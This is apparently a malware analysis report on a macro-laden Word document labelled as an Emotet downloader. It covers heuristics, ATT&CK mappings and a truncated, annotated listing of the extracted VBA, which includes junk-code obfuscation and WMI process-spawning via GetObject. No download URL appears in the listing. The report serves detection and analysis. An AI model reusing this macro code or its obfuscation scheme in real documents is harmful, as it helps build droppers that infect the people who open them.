MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution — caveat: nothing in this report evidences an exploit or parser CVE (the WordBasic heuristic below explicitly disclaims CVE attribution). Execution here depends on a user opening the document and enabling the AutoOpen macro, which maps more precisely to T1204.002 User Execution: Malicious File.
ClamAV identifies the sample as a malicious document downloader with a signature named for the Emotet family (Doc.Downloader.Emotet-6865936-0). The document carries an AutoOpen auto-execution entry point, so the macro runs as soon as a user enables content; because a full VBA project was recovered (see Extracted artifacts), the "legacy WordBasic" marker is corroborating evidence rather than the execution surface itself. The recovered VBA source is heavily obfuscated with junk Select Case blocks, but the readable lines assemble WMI monikers from split string fragments (`"winm" + "gmts:Win32" + ... + "_ProcessStartup"` and `... + "_Process"`) and pass the result to GetObject — consistent with the well-known technique of spawning a child process via WMI (T1047, Win32_Process.Create) so that the launched process is not a direct child of the Word process. The code that builds the command line, and any download URL, falls outside the truncated preview below, so the "downloader" characterisation rests on the ClamAV signature and the family's documented behaviour rather than on a URL recovered from this sample; the only extracted URL is an OOXML schema namespace, not a network indicator.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6865936-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-6865936-0 (signature-based family attribution; treat the family name as a label, not proof, unless corroborated by the extracted code).
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code.
-
AutoOpen macro — high — OLE_VBA_AUTOOPEN: AutoOpen macro (runs automatically when the document is opened once macros are enabled; no user interaction beyond "Enable Content" is required).
-
GetObject call — high — OLE_VBA_GETOBJ: GetObject call (in the extracted script the argument is a `winmgmts:Win32_...` WMI moniker assembled from split string fragments, i.e. COM/WMI object instantiation rather than a benign document reference).
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This heuristic is designed to catch p-code-only or source-extraction-failure macro documents where visible source is unavailable; here decoded source was also recovered, so it serves as independent confirmation that the compiled stream agrees with the source (a mismatch would suggest VBA stomping).
-
Legacy WordBasic auto-exec macro marker — medium — OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The heuristic's canned description states that no modern VBA project was recovered, but this report did recover one (macros.bas, 53,377 bytes, under Extracted artifacts), so that clause does not hold here and this marker should be read as corroborating evidence only. It is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — found in document text (OLE body). Caveat: this is the standard DrawingML XML namespace identifier present in ordinary Office documents, not a download or C2 indicator; do not block or hunt on it.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 53377 bytes |
| SHA-256: 39b9db656f585d0f6e73e122a2ce2ed8492e5a9b879b70866a650d2d3a0c76e9 | | | |
Preview of the extracted script — up to the first 1,000 lines; the listing shown below is truncated part-way through the second function, before the lines that assemble the command passed to the WMI object.
' [analyst note] Module attribute header as emitted by the extractor. VB_Base = "1Normal.ThisDocument"
' and VB_PredeclaredId = True are typical of a document's ThisDocument class module, i.e. code that
' is part of the document itself rather than a separate standard module.
Attribute VB_Name = "W03649"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' [analyst note] A second VB_Name with no other attributes presumably marks the boundary between two
' extracted modules concatenated into one listing — confirm against the raw olevba output. Everything
' that follows belongs to module "S00531__"; module "W03649" contributed no visible code.
Attribute VB_Name = "S00531__"
' [analyst note] Junk / dead-code padding, not functional logic.
' None of the six Select Case subjects (W71__0, R38_167, J_010_, j7_0975, t059655_, F__760_9) is
' assigned anywhere in the visible listing; unless they are declared and set in code not shown, each
' is an uninitialised Variant (Empty) at run time and never equals the single large literal in its
' Case, so every Case body is unreachable. Even if a body were reached, it only performs arithmetic on
' further unassigned names and stores the result in variables nothing visible reads, and the function
' never assigns its own return value. The same Select Case pattern recurs inside i_869024 below,
' interleaved with the real work (WMI moniker assembly + GetObject), and appears intended to inflate
' and obscure the source for static scanners and human readers.
Function V003___()
' Pattern repeated six times: unassigned subject vs. fixed literal -> no match, body skipped.
Select Case W71__0
Case 403329919
Set j1635_1_ = n7667_
V981745_ = (R2180_7 * Fix(221096868 / CBool(B99_2_))) - D18_4__1 / Oct(324891223) / 655895788 + CStr(v9868_) - 106392305 + ChrB(Y_4_5___)
Set h060218_ = h9_9_56
End Select
Select Case R38_167
Case 919499308
Set N_5_541_ = w_8017_
s703806_ = (k387_8 * Fix(704734942 / CBool(Z662_5))) - h__974_ / Oct(154980682) / 345639957 + CStr(n2_78_34) - 367700787 + ChrB(E500_97)
Set r14___64 = O8__129
End Select
Select Case J_010_
Case 611073831
Set K64_11 = v70533
q226223 = (Z194622 * Fix(689601851 / CBool(A53_860))) - G_1_68 / Oct(871099858) / 767659880 + CStr(u13488_) - 540957513 + ChrB(R895_54)
Set b1791_ = P407592
End Select
Select Case j7_0975
Case 935710513
Set z_9_589 = t150__
P53__4 = (t8_996_0 * Fix(344385580 / CBool(i47_842))) - Q_2_851 / Oct(585616498) / 371637813 + CStr(b5_7__) - 495982459 + ChrB(D96277_)
Set h096_82 = F4665_7_
End Select
Select Case t059655_
Case 387890685
Set p_1640 = E490_65
O_70_493 = (a_077_3 * Fix(772027418 / CBool(r2_26084))) - L1_780 / Oct(437008989) / 617568502 + CStr(T4_57_6_) - 149238781 + ChrB(h4_13_64)
Set S3237_3_ = i_6695
End Select
Select Case F__760_9
Case 10472895
Set M031__2 = t6565_
E_2_2_9 = (i3__6__ * Fix(376333391 / CBool(d688917))) - j6279672 / Oct(452916432) / 866412782 + CStr(d155_958) - 643856433 + ChrB(P68285)
Set f__62905 = h88_9153
End Select
End Function
Function i_869024(w__382, J7156_2)
On Error Resume Next
Select Case T5420_
Case 44125887
Set G0842_7_ = u884118
a_43356 = (F_0380 * Fix(823499921 / CBool(i2_810))) - W_1313_ / Oct(655267860) / 687012151 + CStr(b5_097__) - 956213578 + ChrB(r76__0)
Set s82__95_ = l7_9_2__
End Select
Select Case d6__63_2
Case 583333181
Set E6_806 = i97_8__
v715__45 = (r5_873 * Fix(275827680 / CBool(K__6_4))) - E85192 / Oct(992204911) / 221834429 + CStr(s3004_37) - 204214098 + ChrB(A0489_)
Set G31483_7 = I_5666
End Select
S_1__95 = i1371_2 + "winm" + "gmts:Win32" + D7_414_9 + "_ProcessStartup" + F7771412
Select Case D0605707
Case 890763360
Set m474_0 = G8464_
f7567469 = (H34191 * Fix(693978343 / CBool(o____06_))) - O3_1_2_8 / Oct(612441167) / 736864485 + CStr(s__82_2_) - 262658177 + ChrB(H8_9070)
Set N_1_63 = i72_5_22
End Select
Select Case a42_6_
Case 589276965
Set a8475982 = m60_37
i2588257 = (z_774003 * Fix(129569388 / CBool(r4453_))) - W_69__38 / Oct(966036698) / 30912404 + CStr(r2_209) - 282560103 + ChrB(E_55__)
Set J55901 = R7712_2
End Select
Select Case K832_42
Case 377019018
Set w910538 = w_6__0
h7_2_6_4 = (C_00_4 * Fix(321035134 / CBool(i04__927))) - h56487__ / Oct(444476268) / 87095537 + CStr(U537854) - 875676868 + ChrB(D_21681)
Set v_760002 = Q___45
End Select
t965769_ = c_28989 + "winm" + "gmts:Win32" + Y52_04 + "_Process" + q13_63
Select Case m684_17
Case 337052983
Set b791__8 = S14_3_4
M194831 = (k__6_325 * Fix(892570338 / CBool(Z_3822))) - j559322 / Oct(592237208) / 796550443 + CStr(V152__7_) - 252186410 + ChrB(u128_4_)
Set Z08_86 = N0951104
End Select
Select Case l4___6_1
Case 732360738
Set D69654 = T69851
i801778_ = (c910127 * Fix(840157709 / CBool(W796298))) - n9_201 / Oct(508443468) / 71530223 + CStr(i_94_02_) - 725619320 + ChrB(B87253_)
Set r_3_6_07 = a1_11__
End Select
Set W_8_52_ = GetObject(z9__8_2 + S_1__95 + T_8_8_)
Select Case z1270743
Case 269622591
Set j7603_ = j_6866_7
U466_0_9 = (u43422 * Fix(830687889 / CBool(A__102))) - b_1__85 / Oct(867945863) / 796508604 + CStr(i0_976) - 952874986 + ChrB(I658870_)
Set k5_33_ = v0_654
End Select
Select Case P9439_
Case 793654361
Set
... (truncated)
|
|||